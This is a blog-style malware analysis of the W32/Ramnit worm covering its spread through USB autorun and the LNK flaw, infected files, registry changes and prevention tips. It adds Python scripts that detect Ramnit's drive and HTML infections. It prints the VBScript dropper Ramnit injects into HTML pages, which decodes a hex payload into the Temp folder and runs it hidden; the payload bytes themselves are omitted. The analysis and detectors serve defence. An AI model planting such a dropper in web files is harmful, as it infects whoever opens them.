Tuesday, 02 July 2013

All About the W32/Ramnit Worm Attack (Complete Version).

Is your computer infected with W32/Ramnit (2013)? Ramnit is a computer worm currently affecting many Windows users; it is estimated to have infected 800,000 Windows PCs between September and December 2011. With its latest update, the Dr.Web antivirus detects W32/Ramnit as Win32.Siggen.8, while other files belonging to it are recognized as Trojan.Packed.21232, Trojan.Hotrend.34 or Trojan.Starter.1602.

Ramnit was first detected in 2010, attaching itself to most executable files and to USB drives in order to infect additional computers. Originally a generic worm with few capabilities, it was not considered dangerous. In 2011 its authors modified the worm to capture data from web sessions, allowing attackers to commit financial fraud. Most recently it was responsible for the theft of 45,000 login credentials, which were used to infect the victims' friends and to gain remote access to corporate networks. The current version of Ramnit is a hybrid of the original worm with code taken from the ZeuS trojan.

Ramnit is not really a new malware family; it has been actively spreading since 2010. Because attention at the time was focused on malware that abused the LNK (shortcut) vulnerability, such as Sality and Stuxnet, Ramnit received little scrutiny from analysts and computer users worldwide.

Like Stuxnet, the first W32/Ramnit variant appeared between mid-July and August 2010. The second variant appeared in October and November 2010, alongside the Sality shortcut attacks. In mid-January 2011 a third variant of the W32/Ramnit family emerged that followed in its predecessors' footsteps by using the LNK (shortcut) vulnerability to execute and spread its infection.

The W32/Ramnit virus file.

W32/Ramnit is written in the C programming language and compressed with UPX. The malware file has the following characteristics:
  1. Size: 105 KB
  2. File type: 'Application'
  3. Icon: the "music folder" icon
  4. Extension: .exe

Characteristics of W32/Ramnit.

One reason to be especially careful with W32/Ramnit is that it belongs to the group of file-infecting viruses, like Sality, Virut and Alman. This is a scourge for computer users, because cleaning the infected files, especially executables (applications), is difficult.

W32/Ramnit is a variant that infects executable files (applications). It does not stop at executables: it also infects web files (HTM/HTML) and DLL files (dynamic link libraries).

In addition, if the computer is connected to the internet, Ramnit contacts a remote server (an IRC server) and connects to a zombie server address to download a batch of other malware (viruses, trojans, spyware). At certain times W32/Ramnit displays advertisements and pop-ups with pornographic and gambling (casino) content, along with other commercials that make browsing and surfing uncomfortable. Imagine this happening on a computer used by a child and protected with Parental Control software: for parents it is a disaster that their children are exposed to pornography (because the pornographic content displayed will most likely slip past the installed Parental Control), and for children it might be considered a "blessing" that the pornography protection turned out to be tricked.

Combined with the exploitation of the LNK (shortcut) vulnerability, infecting users' computers quickly becomes easy. Although not all three W32/Ramnit variants use the LNK (shortcut) vulnerability, almost all W32/Ramnit variants are very difficult to clean.

For information, the virus spreads via removable media (USB flash drives) by exploiting the Windows autorun feature. So that it is activated automatically it creates an autorun.inf file, and in addition it creates four shortcut files named "Copy of Shortcut to (1).lnk" through "Copy of Shortcut to (4).lnk". If the user runs one of these four shortcuts, the virus file that has been prepared in the directory [%USB Flash%:\RECYCLER\%random name%.exe] is executed automatically.

The virus also injects files with the EXE extension; every injected EXE grows by 107 KB relative to its original size. When an injected EXE is run it creates a duplicate file in the same directory with the name %original_file_name%mgr.exe (for example, if the user runs an injected file named "ATF-Cleaner.exe", a duplicate virus file named "ATF-Cleanermgr.exe" of 105 KB appears; this duplicate is detected as Trojan.Packed.21232).

Ramnit belongs to the trojan/backdoor group. It becomes active once the target computer is connected to the internet, and one of its most dangerous and troublesome actions is downloading other viruses. Notably, the name and type of the downloaded virus vary from one target computer to another, in both name and size, which is what makes detection and cleanup so troublesome even for antivirus programs. Once a file is downloaded successfully it is activated automatically on the computer and carries out the malicious code planted in its body.

In general this virus is quite troublesome: it constantly connects to the internet to call a predefined website address that is displayed repeatedly, which slows the computer down during access. Above all, it injects files with the EXE, DLL and HTM/HTML extensions, both program files and Windows system files, which then require special cleaning steps.

Infection targets.

When Ramnit infects a computer it searches for and infects files with the EXE, DLL and HTM/HTML extensions on all drives, including removable media. The interesting part is Ramnit's ability to insert virus code into every HTM/HTML file it finds. When the victim opens an infected HTM/HTML file, Ramnit automatically creates a file named "svchost.exe" in the folder [C:\Documents and Settings\%UsernamePC%\Local Settings\Temp].

After creating "svchost.exe", Ramnit runs it, which produces a new file named "svchostmgr.exe" in the same location; it then creates "watermark.exe" as the master file in a predefined location. "watermark.exe" stays active in memory for a while and then piggybacks on the Windows "svchost.exe" process, so that the process seen in memory is not "watermark.exe" but "svchost.exe", running under the %username% account (%username% is the user account used to log on to Windows).

Characteristics and visible symptoms
  • Pop-up advertisements or pop-ups with pornographic / gambling content

Periodically, the browser opens pop-up advertisements or pop-ups containing pornographic or gambling (casino) content. This is sometimes quite uncomfortable for computer users. (See Figure 1)

Pop-up advertisements launched by W32/Ramnit

  • The removable media (USB flash) icon changes to a folder icon (see Figure 2)

USB flash drive icon modified by W32/Ramnit

  • Users cannot access the USB flash drive, and the message "Access is denied" is displayed (see Figure 3)

Blocked access to the USB flash drive

  • A "Compressed (zipped) Folders" message appears when accessing the flash disk (see Figure 4)

Error message when accessing the USB flash drive

  • Many files named "Copy of Shortcut to (1).lnk" through "Copy of Shortcut to (4).lnk" appear on the USB flash drive (see Figure 5)

Virus files dropped on the USB flash drive

One thing that is unique, and that makes the virus very easy to activate and hard to eradicate, is that every time the user right-clicks, the computer indirectly runs the virus in addition to displaying the context menu.

Besides the visible symptoms, Ramnit performs actions both visible and invisible whose effects are felt and dangerous for the victim: in addition to stealing data from the victim's computer, it downloads other malware that is just as dangerous, such as Sality, Wapomi, Viking, Renosator, PWSTool, Alman, Kolab and many other harmful families. More details on Ramnit's invisible but dangerous actions can be found at the link below.

Media of spread

To spread itself, W32/Ramnit uses the following vectors:
  • Exploitation of the Windows LNK (shortcut) vulnerability MS10-046 (KB2286198)
  • The Internet: Ramnit can spread over the Internet if the user accesses an HTM or HTML file on a web server that Ramnit has already injected.
  • The network (LAN / WAN), by injecting EXE / DLL / HTM / HTML files in shared folders or drives.
  • USB flash drives, utilizing the Windows autorun feature. On the drive it creates the following files:
  1. autorun.inf
The autorun.inf file contains a script that runs automatically when the user accesses the USB flash drive; the script contains the command to run the file in the directory [RECYCLER\%XX%]

Autorun.inf script
  2. 4 (four) shortcut files (Copy of Shortcut to (1).lnk through Copy of Shortcut to (4).lnk)
  3. %xx%.exe with a size of 105 KB
  4. %xx%.cpl with a size of 4 KB

 Note: %xx% is a folder / file with a random name (see Figure 16)

Files created by the virus

If the user runs one of the shortcut files, the virus file in the directory [RECYCLER\%XX%] is executed automatically.
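The drop pattern just described (an autorun.inf whose launch command points into RECYCLER\, the four decoy "Copy of Shortcut to (N).lnk" files, and random-named .exe/.cpl payloads under a SID-like folder) can be triaged without running anything from the drive. The following Python script is an added example written for this page, not code from the original article. It builds a constructed drive layout of empty placeholder files in a temporary directory (the SID folder name is taken from the list later in this article; the file name "xkqa" is a hypothetical random name) and scans it; point scan_drive() at the root of a real removable drive to use it for triage.

```python
"""Triage a removable drive for the W32/Ramnit dropping pattern (added example)."""
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import List

# Decoy shortcut names: "Copy of Shortcut to (1).lnk" .. "(4).lnk"
SHORTCUT_RE = re.compile(r"^Copy of Shortcut to \(\d+\)\.lnk$", re.I)
# Ramnit hides its payloads under RECYCLER\<SID-looking folder>\
SID_DIR_RE = re.compile(r"^S-\d+(?:-\d+)+$", re.I)
# autorun.inf keys that can launch a program when the drive is opened
AUTORUN_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")
PAYLOAD_EXT = {".exe", ".cpl"}


@dataclass
class Report:
    autorun_targets: List[str] = field(default_factory=list)
    decoy_shortcuts: List[str] = field(default_factory=list)
    recycler_payloads: List[str] = field(default_factory=list)

    @property
    def infected(self) -> bool:
        # Require decoys AND payloads: a lone RECYCLER folder is a normal
        # Recycle Bin leftover, and a lone shortcut may be the user's own.
        return bool(self.decoy_shortcuts) and bool(self.recycler_payloads)


def parse_autorun(text: str) -> List[str]:
    """Return the launch targets named in an autorun.inf.

    Hand-rolled instead of configparser: malicious autorun.inf files often
    carry junk lines, odd casing and duplicate keys that make a strict INI
    parser bail out before it reaches the real 'open=' line.
    """
    targets = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key = key.strip().lower()
        value = value.strip().strip('"')
        if key in AUTORUN_KEYS and value:
            targets.append(value)
    return targets


def scan_drive(root: Path) -> Report:
    """Walk the root of a (removable) drive and collect the Ramnit indicators."""
    rep = Report()
    autorun = root / "autorun.inf"
    if autorun.is_file():
        rep.autorun_targets = parse_autorun(autorun.read_text(errors="ignore"))
    rep.decoy_shortcuts = sorted(
        p.name for p in root.iterdir() if p.is_file() and SHORTCUT_RE.match(p.name)
    )
    recycler = root / "RECYCLER"
    if recycler.is_dir():
        for sid_dir in recycler.iterdir():
            if sid_dir.is_dir() and SID_DIR_RE.match(sid_dir.name):
                for f in sid_dir.iterdir():
                    if f.is_file() and f.suffix.lower() in PAYLOAD_EXT:
                        rep.recycler_payloads.append(f.relative_to(root).as_posix())
    rep.recycler_payloads.sort()
    return rep


def build_sample_drive(base: Path, infected: bool = True) -> Path:
    """Constructed drive layout made of empty placeholder files (no real samples)."""
    (base / "holiday.jpg").touch()
    if infected:
        sid = "S-3-4-70-7603517533-1567780477-325265274-3130"  # SID folder from the article
        payload_dir = base / "RECYCLER" / sid
        payload_dir.mkdir(parents=True)
        (payload_dir / "xkqa.exe").touch()  # hypothetical random name
        (payload_dir / "xkqa.cpl").touch()
        for n in range(1, 5):
            (base / f"Copy of Shortcut to ({n}).lnk").touch()
        (base / "autorun.inf").write_text(
            "[AutoRun]\n"
            ";junk line meant to upset strict INI parsers\n"
            f"OPEN=RECYCLER\\{sid}\\xkqa.exe\n"
            f"shell\\open\\command=RECYCLER\\{sid}\\xkqa.exe\n"
        )
    return base


def run_demo(infected: bool = True) -> Report:
    """Build the constructed drive in a temp directory, scan it, return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_drive(build_sample_drive(Path(tmp), infected))


if __name__ == "__main__":
    r = run_demo()
    print("infected:", r.infected)
    print("autorun targets:", r.autorun_targets)
    print("decoy shortcuts:", r.decoy_shortcuts)
    print("payloads:", r.recycler_payloads)
```

The verdict deliberately requires both the decoy shortcuts and a payload under RECYCLER: either one alone is a plausible false positive on a drive that has simply been used on an XP machine. The autorun targets are reported separately because they are the quickest way to confirm the launch path before the drive is cleaned.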

Harmful actions of Ramnit
  • Error or script-error pop-ups appearing after the advertisement pop-ups.
After the pop-up advertisements appear, an error or script-error pop-up from the browser follows. These script errors resemble those of the "ARP Spoofing" virus of 2008. (See Figure 6)

Error or script-error pop-up

  • Injection of .exe and .dll files

Like the Sality, Alman and Virut malware variants, W32/Ramnit injects .exe files. W32/Ramnit, however, also injects DLL files (dynamic link libraries). Injected .exe and .dll files grow by roughly 100-120 KB, depending on the Ramnit variant doing the infecting. Even so, not every .exe and .dll file on drive C: is injected.

  • Injection of HTM / HTML files

Besides injecting .exe and .dll files, W32/Ramnit also injects HTM and HTML files. The injection is done by adding a header and a footer to the file. (See Figure 7)
In the header, W32/Ramnit adds a script block that names the file to drop and defines WriteData, the dropped executable encoded as a hex string (the hex string runs to thousands of characters and is not reproduced here):

  <SCRIPT Language=VBScript><!--
  DropFileName = "svchost.exe"
  WriteData = "..."   ' hex-encoded bytes of the dropped executable, omitted here
  //--></SCRIPT>

Script added to the HTML file header

  • In the footer, W32/Ramnit adds the script that decodes WriteData into the Temp folder and runs it: (see Figure 8)

  <SCRIPT Language=VBScript><!--
  Set FSO = CreateObject("Scripting.FileSystemObject")
  ' GetSpecialFolder(2) is the Temp folder, so the file lands in %TEMP%\svchost.exe
  DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  If FSO.FileExists(DropPath) = False Then
      Set FileObj = FSO.CreateTextFile(DropPath, True)
      ' Decode two hex digits at a time and write the raw bytes
      For i = 1 To Len(WriteData) Step 2
          FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))
      Next
      FileObj.Close
  End If
  ' Launch the dropped file with a hidden window (0)
  Set WSHshell = CreateObject("WScript.Shell")
  WSHshell.Run DropPath, 0
  //--></SCRIPT>

Script added to the HTML file footer
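The same markers that make this footer work (DropFileName, Scripting.FileSystemObject, GetSpecialFolder(2) for the Temp folder, WScript.Shell) make it easy to find in a web root or on a drive, and the hex loop is trivial to invert so the dropped file can be recovered for analysis without opening the page. The following Python script is an added example written for this page, not code from the original article or from Ramnit's authors: it scores VBScript blocks against those markers, decodes WriteData the way the dropper's loop does, checks for the "MZ" DOS header that marks a Windows executable, and returns a copy of the page with the injected blocks stripped. The sample page and its 16-byte payload are constructed for the demonstration and contain no real executable.

```python
"""Detect and strip the VBScript dropper W32/Ramnit appends to HTM/HTML (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# Strings from the injected script. Requiring most of them together keeps
# ordinary pages that merely use VBScript from being flagged.
MARKERS = (
    "DropFileName",
    "Scripting.FileSystemObject",
    "GetSpecialFolder(2)",   # special folder 2 = the Temp folder, i.e. %TEMP%
    "WScript.Shell",
)
MIN_MARKERS = 3

# A <script> tag whose attributes mention VBScript, through its closing tag.
SCRIPT_RE = re.compile(r"<script[^>]*vbscript[^>]*>.*?</script>", re.I | re.S)
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]*)"')
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"')


@dataclass
class Finding:
    drop_name: str        # file name the script writes into %TEMP%
    payload: bytes        # decoded WriteData
    looks_like_pe: bool   # True when the payload starts with the "MZ" DOS header
    cleaned_html: str     # page with the injected VBScript blocks removed


def decode_writedata(hexdata: str) -> bytes:
    """Decode the payload exactly as the dropper's loop does: two hex digits
    per byte, Chr(CLng("&H" & Mid(WriteData, i, 2)))."""
    if len(hexdata) % 2:
        raise ValueError("WriteData has odd length; truncated injection?")
    return bytes.fromhex(hexdata)


def scan_html(html: str) -> Optional[Finding]:
    """Return a Finding when the page carries the Ramnit-style dropper, else None."""
    blocks = [m.group(0) for m in SCRIPT_RE.finditer(html)]
    suspicious = [b for b in blocks if any(mk in b for mk in MARKERS)]
    joined = "\n".join(suspicious)   # header and footer blocks are scored together
    if sum(mk in joined for mk in MARKERS) < MIN_MARKERS:
        return None
    name = DROPNAME_RE.search(joined)
    data = WRITEDATA_RE.search(joined)
    payload = decode_writedata(data.group(1)) if data else b""
    cleaned = html
    for b in suspicious:
        cleaned = cleaned.replace(b, "")
    return Finding(
        drop_name=name.group(1) if name else "",
        payload=payload,
        looks_like_pe=payload[:2] == b"MZ",
        cleaned_html=cleaned,
    )


# Constructed sample: an infected page whose "payload" is a 16-byte fake DOS
# header, not a real executable. The script lines mirror the article's listing.
SAMPLE_HTML = (
    "<html><head><title>Sample</title>\n"
    "<SCRIPT Language=VBScript><!--\n"
    'DropFileName = "svchost.exe"\n'
    'WriteData = "4D5A90000300000004000000FFFF0000"\n'
    "//--></SCRIPT>\n"
    "</head><body><p>Normal page content.</p>\n"
    "<SCRIPT Language=VBScript><!--\n"
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\n'
    "If FSO.FileExists(DropPath) = False Then\n"
    "Set FileObj = FSO.CreateTextFile(DropPath, True)\n"
    "For i = 1 To Len(WriteData) Step 2\n"
    'FileObj.Write Chr(CLng("&H" & Mid(WriteData, i, 2)))\n'
    "Next\n"
    "FileObj.Close\n"
    "End If\n"
    'Set WSHshell = CreateObject("WScript.Shell")\n'
    "WSHshell.Run DropPath, 0\n"
    "//--></SCRIPT>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    f = scan_html(SAMPLE_HTML)
    if f is None:
        print("clean")
    else:
        print(f"injected: drops {f.drop_name}, {len(f.payload)} payload bytes, "
              f"PE header: {f.looks_like_pe}")
        print(f.cleaned_html)
```

Because Ramnit splits the injection across a header block and a footer block, the two are scored together rather than individually; the recovered payload bytes are what you would hand to an antivirus or sandbox, and the cleaned page is only safe to put back after the executables on the same host have been dealt with, since the infector will otherwise re-inject it.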

  • Making the Windows Services window blank

By injecting the files "iexplore.exe" and "services.exe", and by adding its script to web files (htm / html), Ramnit causes the Windows Services window to appear blank. (See Figure 9)

Blank Windows Services window

  • Making the computer hang / slow, and the network connection slow or even disconnected. Some of the symptoms and their causes can be explained as follows, based on the type of file Ramnit injects:
  1. C:\WINDOWS\system32\svchost.exe: svchost.exe is a system file associated with the network connection. As a result, the computer loses its network connection once this file is injected.
  2. C:\WINDOWS\system32\lsass.exe: lsass.exe is a system file tied to the computer's activity. As a result of this injection the system becomes slow or hangs.
  3. C:\WINDOWS\system32\services.exe: services.exe is associated with the running system services and drivers. This injection disrupts those services and drivers.
  4. C:\Program Files\Internet Explorer\iexplore.exe: iexplore.exe is Microsoft's Internet Explorer browser. The purpose of this injection is to control the browser so that it connects to the remote server Ramnit has predetermined.
  • Active processes in memory

As stated above, after taking over Internet Explorer, W32/Ramnit tries to connect to its remote server through the injected Internet Explorer. This can be seen in Task Manager even when we have not opened IE / Internet Explorer ourselves (see Figure 10)

IEXPLORE.EXE (Internet Explorer) process injected by W32/Ramnit

  • Connecting to a remote server

W32/Ramnit connects to a remote server to deliver the information it has collected. The remote servers used include the following:

  • Transferring data to a remote server

Besides connecting to and communicating with the remote server, W32/Ramnit also tries to transfer data from the victim's computer to the remote server and, in the other direction, to send malware files down to the victim's computer. (See Figure 11)

Data transfer between the victim's computer and the remote server

  • Broadcasting

Like the Conficker worm, W32/Ramnit also broadcasts on the network. The difference is that W32/Ramnit only does so toward a single address: ADX.ADNXS.COM (see Figure 12)

Broadcast performed by W32/Ramnit

  • When executed, W32/Ramnit injects the following Windows system files:

  1. C:\WINDOWS\system32\lsass.exe
  2. C:\WINDOWS\system32\svchost.exe
  3. C:\WINDOWS\system32\services.exe
  4. C:\Program Files\Internet Explorer\IEXPLORE.EXE

  • If connected to the internet, W32/Ramnit downloads further malware and creates the following files and folders:

  1. C:\Documents and Settings\%username%\Local Settings\Temp\[number].tmp
  2. C:\Documents and Settings\%username%\Local Settings\Temp\explorer.dat
  3. C:\Documents and Settings\%username%\Local Settings\Temp\winlogon.dat
  4. C:\Documents and Settings\%username%\Local Settings\Temp\[Random_name].exe
  5. C:\Documents and Settings\%username%\Start Menu\Programs\[Random_name].exe
  6. C:\Program Files\Internet Explorer\complete.dat
  7. C:\Program Files\Internet Explorer\dmlconf.dat
  8. C:\Program Files\win\[Random_number].exe
  9. C:\Program Files\qwe
  10. C:\WINDOWS\[Random_name].exe
  11. C:\WINDOWS\System32\[Random_name].dll
  12. C:\WINDOWS\System32\[name & number_Random].dll
  13. C:\WINDOWS\Temp\[number].tmp

  • In addition, W32/Ramnit injects the following files (if present):

  1. C:\contacts.html
  2. C:\inetpub\wwwroot\index.html
  3. C:\Program Files\Common Files\designer\MSADDNDR.DLL
  4. C:\Program Files\Common Files\designer\MSHTMPGD.DLL
  5. C:\Program Files\Common Files\designer\MSHTMPGR.DLL
  6. C:\Program Files\Common Files\System\ado\MDACReadme.htm
  7. C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
  8. C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
  9. C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
  10. C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
  11. C:\Program Files\MSN\MSNIA\custdial.dll
  12. C:\Program Files\MSN\MSNIA\msniasvc.exe
  13. C:\Program Files\MSN\MSNIA\prestp.exe
  14. C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
  15. C:\Program Files\MSN\MsnInstaller\msdbxi.dll
  16. C:\Program Files\MSN\MsnInstaller\msninst.dll
  17. C:\Program Files\MSN\MsnInstaller\msninst.exe
  18. C:\Program Files\MSN\MsnInstaller\msnsign.dll
  19. C:\Program Files\NetMeeting\netmeet.htm

  • On removable disks / drives it creates the following files:

  1. autorun.inf
  2. Copy of Shortcut to (1).lnk
  3. Copy of Shortcut to (2).lnk
  4. Copy of Shortcut to (3).lnk
  5. Copy of Shortcut to (4).lnk
  6. RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[Random_name1].exe through [Random_name11].exe (11 files)
  7. RECYCLER\S-3-4-70-7603517533-1567780477-325265274-3130\[Random_name1].cpl through [Random_name11].cpl (11 files)
  8. RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[Random_name1].exe through [Random_name7].exe (7 files)
  9. RECYCLER\S-8-1-53-2203638008-1861115022-526586310-2180\[Random_name1].cpl through [Random_name7].cpl (7 files)

  • On mapped network drives, it also tries to inject files with the following names:

  1. Blank.htm
  2. Citrus Punch.htm
  3. Clear Day.htm
  4. Fiesta.htm
  5. Ivy.htm
  6. Leaves.htm
  7. Maize.htm
  8. Nature.htm
  9. Network Blitz.htm
  10. Pie Charts.htm
  11. Sunflower.htm
  12. Sweets.htm
  13. Technical.htm

Registry modifications

Some of the registry modifications made by the W32/Ramnit worm are as follows:

Registry additions

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Random_name] = C:\Documents and Settings\%username%\Local Settings\Temp\[Random_name].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\International
(The Run value is the persistence entry that relaunches the dropped file at logon; Windows creates Enum\Root\LEGACY_<name> keys when a service or driver is registered, so the LEGACY_60DFFE60 keys point to a service Ramnit installed.)

Registry removals

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
DisableSR = 0x00000001
(Setting DisableSR to 1 turns System Restore off, so the restore points a user might roll back to are no longer available.)

Registry changes

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =

Spreading methods
Some of the ways W32/Ramnit distributes itself are as follows:

  • Drive-by download (exploit)

W32/Ramnit initially spread through drive-by downloads on Windows systems. Links scattered across forums or e-mail try to trick the user into opening them; it also spreads through websites that offer content or browser plugins for download.

  • Removable drive / disk

This is the route most often seen among computer users. W32/Ramnit creates a number of files to infect computers, and also exploits the LNK (shortcut) vulnerability. (See Figure 10)

W32/Ramnit infecting a removable disk / drive

  • Network

W32/Ramnit tries to inject a number of web files (htm) on particular computers on the network that have mapped drives. The files are the following:

  1. Blank.htm
  2. Citrus Punch.htm
  3. Clear Day.htm
  4. Fiesta.htm
  5. Ivy.htm
  6. Leaves.htm
  7. Maize.htm
  8. Nature.htm
  9. Network Blitz.htm
  10. Pie Charts.htm
  11. Sunflower.htm
  12. Sweets.htm
  13. Technical.htm

Prevention tips against W32/Ramnit malware.

  1. Enable the Windows Firewall or another firewall product, to block unwanted access.
  2. Make sure the computer receives the latest Windows updates. The simplest way is to use "Automatic Updates"; alternatively, download the latest patches from Microsoft's website.
  3. Use an antivirus that is always kept up to date, so that it can handle new malware variants.
  4. Restrict administrator access. Windows 7 and Vista users should make sure UAC (User Account Control) is running properly.
  5. Be careful when opening e-mail attachments or receiving file transfers from unknown people. Always scan them with an updated antivirus first.
  6. Be wary of cracks / keygens or unknown programs: they may be infected or contain malware.
  7. Use passwords that are not easy to read or guess. Change passwords at regular intervals, and use a different password for each account.
  8. Turn off Windows "autoplay" to prevent unwanted programs on removable drives / disks from running automatically.
  9. Turn off file sharing when it is not in use. If sharing is needed, share read-only, or configure sharing for specific users only.
  10. Be careful when visiting websites or forums that offer links to download or install something.

Author : Yohanes Gitoyo.
Source : 
